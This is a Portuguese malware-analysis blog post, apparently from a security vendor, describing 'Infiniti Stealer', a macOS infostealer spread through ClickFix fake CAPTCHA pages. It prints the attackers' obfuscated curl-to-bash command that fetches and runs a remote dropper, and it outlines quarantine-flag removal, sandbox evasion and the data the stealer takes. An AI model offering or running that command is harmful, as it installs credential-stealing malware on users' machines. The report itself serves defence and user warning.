Infiniti Stealer: um novo infostealer para macOS usando ClickFix e Python/Nuitka

Um infostealer do macOS anteriormente não documentado surgiu durante nossa caça rotineira a ameaças. Inicialmente o rastreamos como NukeChainmas pouco antes da publicação, o painel do operador do malware tornou-se publicamente visível, revelando seu nome real: Ladrão Infiniti.

Este malware foi projetado para roubar dados confidenciais de Macs. Ele se espalha por meio de uma página CAPTCHA falsa que engana os usuários para que executem eles próprios um comando: uma técnica conhecida como ClickFix. Em vez de explorar um bug, depende da engenharia social.

A carga final é escrita em Python e compilada com Nuitka, produzindo um binário nativo do macOS. Isso torna mais difícil analisar e detectar do que o malware típico baseado em Python.

Até onde sabemos, esta é a primeira campanha documentada do macOS que combina a entrega ClickFix com um ladrão Python compilado em Nuitka.

ClickFix: engenharia social em vez de explorações

ClickFix não depende de vulnerabilidades de software. Em vez disso, depende de convencer o usuário a executar um comando por conta própria.

Uma página de verificação falsa instrui o visitante a abrir o Terminal, colar um comando e pressionar Return. Uma vez executado, o processo de infecção começa imediatamente. A técnica ganhou popularidade em sistemas Windows, mas agora está sendo adaptada para macOS, com instruções adaptadas à plataforma: Command + Espaço > abrir Terminal > colar o comando

Como o usuário executa o comando diretamente, muitas defesas tradicionais são contornadas. Não há exploração, nenhum anexo malicioso e nenhum download drive-by.

Entrega falsa de CAPTCHA

A infecção começa às update-check(.)comque oferece uma réplica convincente de uma página de verificação humana da Cloudflare.

A página instrui o usuário a colar um comando de verificação no Terminal:

bash <(curl -sSfL $(echo aHR0cHM6Ly91cGRhdGUtY2hlY2suY29tL20vN2Q4ZGYyN2Q5NWQ5 | base64 --decode))

Depois de decodificada, a string é resolvida para uma URL hospedada no mesmo domínio que retorna o script dropper do primeiro estágio.

Estágio 1: Bash Dropper

A primeira carga útil é um script Bash usando um modelo observado anteriormente em ladrões de macOS, como MacSync (também referido como SHub em pesquisas anteriores). Isso sugere o uso de um construtor compartilhado.

Suas responsabilidades são diretas:

• Decodifique a carga incorporada
• Escreva o binário Stage-2 em /tmp
• Remova o sinalizador de quarentena usando xattr -dr com.apple.quarantine
• Execute o binário via nohup
• Passe o servidor de comando e controle (C2) e o token de autenticação como variáveis ​​de ambiente
• Exclua-se e feche o Terminal via AppleScript

Estágio 2: Carregador Nuitka

O binário eliminado é um executável Apple Silicon Mach-O (~8,6 MB). compilado usando o modo onefile do Nuitka.

Seu cabeçalho contém a assinatura:

4b 41 59 28 b5 2f fd

Isto corresponde a um KAY ( cabeçalho seguido por um arquivo compactado zstd usado por Nuitka para empacotar aplicativos Python.

Ao contrário do PyInstaller, Nuitka compila o código-fonte Python em C e produz um binário nativo, aumentando a complexidade da análise estática.

Em tempo de execução, o carregador descompacta aproximadamente 35 MB de dados incorporados e inicia a carga final.

Estágio 3: carga útil do Python Stealer

A carga final, UpdateHelper(.)biné um ladrão de Python 3.11 compilado com Nuitka.

Apesar da compilação, o binário expõe milhares de símbolos nomeados, permitindo que a estrutura do seu módulo seja reconstruída durante a análise.

O ladrão tem como alvo uma ampla gama de dados confidenciais:

• Credenciais de navegadores baseados em Chromium e Firefox
• Entradas do chaveiro do macOS
• Carteiras de criptomoeda
• Segredos de texto simples em arquivos de desenvolvedor, como .env
• Capturas de tela capturadas durante a execução

Os dados são exfiltrados usando solicitações HTTP POST.

Antes de iniciar a coleta de dados, o malware verifica se está sendo executado em ambientes de análise conhecidos, incluindo:

• qualquer.run
• Caixa de areia Joe
• Análise Híbrida
• VMware
• Caixa Virtual

Também introduz um atraso de execução aleatório para evitar sistemas de análise automatizados.

Quando a exfiltração for concluída, uma função chamada upload_complete() envia uma notificação do Telegram ao operador e enfileira as credenciais capturadas para quebra de senha no servidor.

O que fazer se você acha que foi afetado

A percepção de que o macOS é um alvo de malware de baixo risco continua a desaparecer.

Infiniti Stealer mostra como técnicas que funcionavam no Windows – como ClickFix – agora estão sendo adaptadas para usuários de Mac.

Ele também usa técnicas mais recentes, como compilar Python em aplicativos nativos, o que torna o malware mais difícil de detectar e analisar. Se esta abordagem for eficaz, poderemos ver mais ataques como este.

Se você seguiu instruções como esta ou colou comandos de um site no Terminal, tome medidas imediatamente:

1. Pare de usar o dispositivo para atividades confidenciais (bancos, e-mail, contas de trabalho).
2. Altere suas senhas em um dispositivo limpocomeçando com e-mail, serviços bancários e ID Apple.
3. Revogar acesso: saia de sessões ativas e revogue tokens de API e chaves SSH
4. Verifique se há arquivos suspeitos em /tmp e ~/Library/LaunchAgents/
5. Execute uma verificação completa do Malwarebytes para detectar e remover qualquer malware restante.

Lembre-se: não cole comandos de sites no Terminal. Nenhum CAPTCHA legítimo exige isso.

Indicadores de Compromisso (IOCs)

Agradecimentos

Com agradecimentos a Marcelo Rivero pela análise binária.

Não apenas informamos ameaças: nós as removemos

Os riscos de cibersegurança nunca devem ultrapassar as manchetes. Mantenha as ameaças longe dos seus dispositivos baixando o Malwarebytes hoje mesmo.